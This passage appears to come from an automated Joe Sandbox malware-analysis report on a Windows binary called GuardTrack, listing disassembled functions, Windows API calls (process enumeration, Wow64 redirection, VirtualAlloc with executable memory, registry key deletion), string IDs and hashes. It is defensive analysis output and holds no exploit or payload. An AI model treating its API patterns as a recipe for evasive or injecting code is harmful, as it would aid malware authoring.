                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 6e494538b51ab573f3b5908af61db9948382f88eb213738ffad5c7aac13b78f5
                                                          • Instruction ID: d1fe523163eb13a86bd31316bd23ad0fa4c062b32b7406be40c9a9703d38a190
                                                          • Opcode Fuzzy Hash: 6e494538b51ab573f3b5908af61db9948382f88eb213738ffad5c7aac13b78f5
                                                          • Instruction Fuzzy Hash: 7C21A332604219BFDF258F54CC86FEE3BAAEF48724F111114FE156B190DA71A951DBE0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0063826F
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0063827D
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00638284
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 6c160b00487d16e7d3dfac49fff184f2f6426bc1ae136a78ae61fa8f4c238e31
                                                          • Instruction ID: bac8d8bebf17f7d53158ef07bee9b4537cec3e569baedadfb842b074f2e9161c
                                                          • Opcode Fuzzy Hash: 6c160b00487d16e7d3dfac49fff184f2f6426bc1ae136a78ae61fa8f4c238e31
                                                          • Instruction Fuzzy Hash: 76216DB5604209AFDB10DF58CC85DA737AEEB8A394F180059FA0597351CB70EC51CAE0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00637360
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00637370
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00637395
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 494a95ed3a5c78f30373fab75c89b8d6d627e6d798970dc6f3915b54eb146acf
                                                          • Instruction ID: 0dc141270fce4ade42cd7a8759c8c6634fc202c73272ab7be81d02aaa35d147b
                                                          • Opcode Fuzzy Hash: 494a95ed3a5c78f30373fab75c89b8d6d627e6d798970dc6f3915b54eb146acf
                                                          • Instruction Fuzzy Hash: 9921B072604118BFEF258F54CC85EFF3BABEB89764F118124FA059B290C671AC519BE0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00637D97
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00637DAC
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00637DB9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: c2ad71ddea967eccdfdc239bb7d69d690c5ac1fbb86619118ad0e3158f3b00c6
                                                          • Instruction ID: 9e42dd5d47ea48bcf42c2a099b7c55fd955e514ef00ee22c428bc835e7da7d60
                                                          • Opcode Fuzzy Hash: c2ad71ddea967eccdfdc239bb7d69d690c5ac1fbb86619118ad0e3158f3b00c6
                                                          • Instruction Fuzzy Hash: C3110A72244209BEDF245F64CC05FE73BAAEF89754F11412CFB45A6190D671E851DB60
                                                          APIs
                                                            • Part of subcall function 005EB544: _memset.LIBCMT ref: 005EB551
                                                            • Part of subcall function 005D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005EB520,?,?,?,005B100A), ref: 005D0B79
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,005B100A), ref: 005EB524
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005B100A), ref: 005EB533
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005EB52E
                                                          • =e, xrefs: 005EB514
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=e
                                                          • API String ID: 3158253471-3379168962
                                                          • Opcode ID: f4965e69ae93dfdf38fd704802ddb216a8c9e00afd9a04e4c1ae1a32bd076b0b
                                                          • Instruction ID: 0ed79075a036b241d54cd0c0f611e6c97ddd76ed65ec7bec94881f73d482e677
                                                          • Opcode Fuzzy Hash: f4965e69ae93dfdf38fd704802ddb216a8c9e00afd9a04e4c1ae1a32bd076b0b
                                                          • Instruction Fuzzy Hash: 16E065741007628BE3249F25E4087537EF1BF04745F00461EE496C2741F7B4D544CB91
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005F027A,?), ref: 0062C6E7
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0062C6F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: a599957a584d65d206ac13d8841d7cded815bab8d32efabee808f623606d1970
                                                          • Instruction ID: fe44d1f75237f3e67d2ba0b4e94fdbe991797b84a2b0a6effcbf13beb3238cac
                                                          • Opcode Fuzzy Hash: a599957a584d65d206ac13d8841d7cded815bab8d32efabee808f623606d1970
                                                          • Instruction Fuzzy Hash: AAE0C2B8110B32CFE7205B25DC48A9A76D6FF14325B509429E985C3310D770C880CF10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005C4B44,?,005C49D4,?,?,005C27AF,?,00000001), ref: 005C4B85
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005C4B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: aea4745a5c13f5353c755d297acedbd6fabe2627bbcef06f0a6203cf0e4924d8
                                                          • Instruction ID: 770b342ebcd8d443e289eb7df688516c72c9d6fc18c284d630c06e74466d2795
                                                          • Opcode Fuzzy Hash: aea4745a5c13f5353c755d297acedbd6fabe2627bbcef06f0a6203cf0e4924d8
                                                          • Instruction Fuzzy Hash: 65D017B4520722CFEB209FB1DC28F067AE6AF05355F12982ED586E2650E6B0E880CA14
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005C4AF7,?), ref: 005C4BB8
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005C4BCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: d8138505d238b6bd8d62c1850371076a504a71282f2095920e809a9c92f3d5d7
                                                          • Instruction ID: 073b50c039b6c385171b57a992aa4bedbaf119f4e5a4f3f7aa557209eb5688cc
                                                          • Opcode Fuzzy Hash: d8138505d238b6bd8d62c1850371076a504a71282f2095920e809a9c92f3d5d7
                                                          • Instruction Fuzzy Hash: AED01274520722CFE7205FB1DC18F0676D6AF05355F11AC6DD585D2554DA78D880CA10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00631696), ref: 00631455
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00631467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: ab44e51c79054a4dfb3360b4710cd72070691341a27fb7f15748298be3076acb
                                                          • Instruction ID: a4fadb60ea7f84cf525bf2d9a0b536143d39790976d14737cd7615da6d609b39
                                                          • Opcode Fuzzy Hash: ab44e51c79054a4dfb3360b4710cd72070691341a27fb7f15748298be3076acb
                                                          • Instruction Fuzzy Hash: 21D01274510722CFE7205F75C80865676D6AF07395F11C82B94E5D7250D670D4C0CA50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005C5E3D), ref: 005C55FE
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005C5610
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: cdb367ef75c8748a88f5b37d4047cecb2fe66b70f5481e5c0412f4e3ac0de9bf
                                                          • Instruction ID: 79ba63d8766bb2bb149d384568b3b873aba0ac2dd46caf7c349fc37214b742f1
                                                          • Opcode Fuzzy Hash: cdb367ef75c8748a88f5b37d4047cecb2fe66b70f5481e5c0412f4e3ac0de9bf
                                                          • Instruction Fuzzy Hash: 9BD01278520722CFF7205FB1C8086177AD5AF05355B11982DD586D2151E670D4C0CA50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,006293DE,?,00640980), ref: 006297D8
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006297EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 17ad8271567a0aa9af615cdbd9e1043695bf818a518a6aca526ff104e7d5815f
                                                          • Instruction ID: 7c221a5eb2e69f18e36c7f62945f7a04395ebc75e38095c697168eb648ebf4d4
                                                          • Opcode Fuzzy Hash: 17ad8271567a0aa9af615cdbd9e1043695bf818a518a6aca526ff104e7d5815f
                                                          • Instruction Fuzzy Hash: 8FD01274520733CFE7205F71E88864676D6AF05395F11A829D985D2250DB74C480CA11
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab2eac565e7b6798ce40ef7079384ac73e20970a7a87d4be02588e7723721f1f
                                                          • Instruction ID: 3ff425625d083d655bd4bbb5309d1cfbc44f046e068d31d2bd32292d09e850d6
                                                          • Opcode Fuzzy Hash: ab2eac565e7b6798ce40ef7079384ac73e20970a7a87d4be02588e7723721f1f
                                                          • Instruction Fuzzy Hash: 98C14C75A40216EFCB18CF94C884EABB7B6FF48714B118598E846DB391DB31ED81CB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 0062E7A7
                                                          • CharLowerBuffW.USER32(?,?), ref: 0062E7EA
                                                            • Part of subcall function 0062DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0062DEAE
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0062E9EA
                                                          • _memmove.LIBCMT ref: 0062E9FD
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 8841e5bfaf77bc5dbe9cba080867ae9723797976017236d1cc5c42c44a488957
                                                          • Instruction ID: 86d93a2c718a5c763865694640789abf77450b9a05c926292a8ed5b7cf1fb9b1
                                                          • Opcode Fuzzy Hash: 8841e5bfaf77bc5dbe9cba080867ae9723797976017236d1cc5c42c44a488957
                                                          • Instruction Fuzzy Hash: 3DC17B71A087118FC714DF28C484A6ABBE5FF89314F14896EF8999B352D731E946CF82
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 006287AD
                                                          • CoUninitialize.OLE32 ref: 006287B8
                                                            • Part of subcall function 0063DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00628A0E,?,00000000), ref: 0063DF71
                                                          • VariantInit.OLEAUT32(?), ref: 006287C3
                                                          • VariantClear.OLEAUT32(?), ref: 00628A94
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: d8d9716d95b2037e67508de8acf552f5bab476d5b04e5e9dd53677455d83ee50
                                                          • Instruction ID: ea8cdcde044462fd1878cb19f9fe693647b99ae0687fede90a6282a4b6d735d2
                                                          • Opcode Fuzzy Hash: d8d9716d95b2037e67508de8acf552f5bab476d5b04e5e9dd53677455d83ee50
                                                          • Instruction Fuzzy Hash: 62A13675604B129FD710EF14D885A6ABBE6BF88350F148849F9959B3A2CB30FD41CF92
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00643C4C,?), ref: 00608308
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00643C4C,?), ref: 00608320
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00640988,000000FF,?,00000000,00000800,00000000,?,00643C4C,?), ref: 00608345
                                                          • _memcmp.LIBCMT ref: 00608366
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 51a45f59866e0acca8033e13ada6c2a5e578e24084b18da80706cae9fe2e1c84
                                                          • Instruction ID: cc808b440a40001b3495a8c4057e9d5f3c84056c71f72f14ae062b4107823c20
                                                          • Opcode Fuzzy Hash: 51a45f59866e0acca8033e13ada6c2a5e578e24084b18da80706cae9fe2e1c84
                                                          • Instruction Fuzzy Hash: FA811D75A00209EFCB04DFD4C984EEEB7BAFF89315F104558E545AB251DB71AE06CBA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: 655507c954ade0d41ade31e4ad9250535182b048190cc1c772b0c66e2b12cbea
                                                          • Instruction ID: 5c5e93ab261a82022959fecff761907ec723ee80dbe5965d5678d08f482901f8
                                                          • Opcode Fuzzy Hash: 655507c954ade0d41ade31e4ad9250535182b048190cc1c772b0c66e2b12cbea
                                                          • Instruction Fuzzy Hash: E151C834A987029ADB289F799895A7FB7E6AF44310B309C1FE547C73D1EA31B8418B05
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0062F526
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0062F534
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0062F5F4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0062F603
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 496e3d02bd80e2d4ad59ca912b301fc3baa3292752e053a8f760df101b6b2f22
                                                          • Instruction ID: 906293d3681fd800ae1e390c1656b472d9812a7e966ee83807919d1d1b708820
                                                          • Opcode Fuzzy Hash: 496e3d02bd80e2d4ad59ca912b301fc3baa3292752e053a8f760df101b6b2f22
                                                          • Instruction Fuzzy Hash: 73517D711047129FD320EF60D849FABBBE9FF95710F00492DF585972A2EB70A904CB92
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00639E88
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00639EBB
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00639F28
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
